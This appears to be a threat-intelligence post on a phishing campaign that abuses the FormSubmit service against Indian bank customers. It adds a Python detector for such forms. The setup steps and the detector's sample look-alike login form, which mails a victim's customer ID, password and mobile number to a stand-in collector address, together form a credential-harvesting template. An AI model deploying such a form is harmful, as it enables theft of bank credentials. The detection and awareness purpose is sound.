Scammers Misuse FormSubmit SaaS Platform to Steal PII of Indian Banking Customers

December 14, 2022 | 4 min read

Category: Adversary Intelligence

Industry: Banking and Finance

Motivation: Financial

Region: Asia & Pacific

Executive Summary

Threat
  • Scammers use a free, no-code form service to forward victims’ PII straight to an email address they have verified with the service.
  • Using this, scammers can steal banking credentials and PII without running any back-end of their own.
Impact
  • Stolen PII can be used to fuel further social engineering campaigns.
  • Victims can be exploited financially.
Mitigation
  • Use XVigil to actively track such events and take the necessary actions.
  • Educate customers about such fraudulent activities through social media posts.

Analysis and Attribution

  • CloudSEK’s contextual AI digital risk platform XVigil uncovered a phishing campaign abusing a SaaS platform, named FormSubmit, to impersonate a popular Indian bank.
  • FormSubmit is a no-code form service, designed to send input data from an HTML form straight to a specified email address.
  • This campaign was uncovered while analyzing a suspect domain which was classified as a threat by XVigil on 10 November 2022.

Information from the Fake Domain

  • The following information was gathered from the WHOIS records:
    • Creation Date: 08 November 2022
    • Updated Date: 08 November 2022
    • Domain Registrar: GoDaddy

Using FormSubmit to Create a Phishing Page

FormSubmit requires no back-end integration, only an HTML form on the hosted website, and can be set up in three steps:

  1. Point the form on the hosted website at FormSubmit.
  2. Give every form element (<input>, <select> and <textarea>) a name attribute so that its value is included in the submission data; controls without a name are never submitted by the browser.
  3. The first submission of the form requires the recipient to confirm the specified email address, after which every later submission is delivered to it automatically.
Screenshot of the website of FormSubmit
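The check a defender wants at this point is the reverse of the three steps above: given the HTML of a suspect page, find any form whose action hands the submission to FormSubmit and list the credential- or PII-like fields it would forward. The following is an added example written for this write-up, not CloudSEK's or FormSubmit's code. The sample page is constructed; the action URL pattern (https://formsubmit.co/<address>, or the /ajax/ variant) and the hidden control fields _next (post-submit redirect) and _captcha follow FormSubmit's public documentation, while the SENSITIVE_HINTS field-name heuristic is an assumption of mine and deliberately loose.

```python
"""Detect HTML forms that hand their submissions to FormSubmit.

Added example (not CloudSEK's or FormSubmit's code). SAMPLE_PAGE is a
constructed look-alike; SENSITIVE_HINTS is an assumed heuristic.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

FORMSUBMIT_HOSTS = {"formsubmit.co", "www.formsubmit.co"}

# Substrings that usually mean a credential or PII field on a banking page.
# Assumed heuristic: it will over-match (e.g. "shipping" contains "pin").
SENSITIVE_HINTS = (
    "pass", "pwd", "pin", "otp", "card", "cvv", "expiry", "account", "acct",
    "aadhaar", "pan", "ifsc", "mobile", "phone", "dob", "user", "login", "cust",
)


class FormScanner(HTMLParser):
    """Collect every <form> together with the named fields it would submit."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # valueless attributes map to None
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name")
            if not name:
                return  # browsers never submit a control without a name
            ftype = (a.get("type") or "text").lower() if tag == "input" else tag
            self._current["fields"].append(
                {"name": name, "type": ftype, "value": a.get("value") or ""}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def is_formsubmit_action(action):
    """True when the form posts to FormSubmit itself (plain or /ajax/ endpoint)."""
    host = (urlparse(action).hostname or "").lower()
    return host in FORMSUBMIT_HOSTS  # exact host match, not a substring search


def sensitive_fields(fields):
    """Names of fields that look like credentials or PII."""
    return [
        f["name"] for f in fields
        if f["type"] == "password"
        or any(hint in f["name"].lower() for hint in SENSITIVE_HINTS)
    ]


def scan_html(html):
    """Return one finding per form that exfiltrates via FormSubmit."""
    parser = FormScanner()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if not is_formsubmit_action(form["action"]):
            continue
        hidden = {f["name"]: f["value"] for f in form["fields"] if f["type"] == "hidden"}
        findings.append({
            "action": form["action"],
            "method": form["method"],
            "sensitive": sensitive_fields(form["fields"]),
            "all_fields": [f["name"] for f in form["fields"]],
            # _next sends the victim on (often to the real bank) after the data
            # has already been mailed out; _captcha=false removes the one
            # interactive step that might have made them pause.
            "redirect_to": hidden.get("_next", ""),
            "captcha_disabled": hidden.get("_captcha", "").lower() == "false",
        })
    return findings


# Constructed sample: a look-alike net banking login wired to FormSubmit,
# plus a harmless search form on the same page that must not be flagged.
SAMPLE_PAGE = """
<html><body><h2>Net Banking Login</h2>
<form action="https://formsubmit.co/collector@example.com" method="POST">
  <input type="text" name="customer_id">
  <input type="password" name="password">
  <input type="text" name="registered_mobile">
  <input type="hidden" name="_next" value="https://example.com/thanks">
  <input type="hidden" name="_captcha" value="false">
  <input type="submit" value="Login">
</form>
<form action="/search" method="GET"><input type="text" name="q"></form>
</body></html>
"""

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_PAGE):
        print(f"form -> {hit['action']} via {hit['method'].upper()}")
        print(f"  sensitive fields : {hit['sensitive']}")
        print(f"  redirect after   : {hit['redirect_to'] or '(none)'}")
        print(f"  captcha disabled : {hit['captcha_disabled']}")
```

Run it directly to see the finding for the constructed page, or feed scan_html the fetched HTML of a real suspect domain. The host check is an exact hostname comparison rather than a substring search, so a look-alike domain that merely contains "formsubmit" is not matched by accident, and the unrelated search form on the same page is ignored. The _next and _captcha values are worth surfacing in a report because together they explain why a victim sees nothing suspicious: the data is mailed out on submit and the browser is immediately sent on.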

Similar Phishing Campaigns

  • Scammers are rapidly adopting newer technologies and abusing services and features provided by various SaaS platforms.
  • In 2022, CloudSEK observed a new trend of abusing domain forwarding services (mostly freemium) offered by web hosting providers to host phishing pages.
  • These campaigns are usually targeted at Indian banking customers.
  • Previously, the following services were abused by threat actors for their campaigns:
    • Reverse tunneling services offered by ngrok, TryCloudflare, LocalHostRun and others
    • Cloudflare Pages
    • Hostinger’s Preview Domain
    • A2 Hosting’s services

Appendix

Screenshot of the phishing website used by scammers to steal customers’ PII details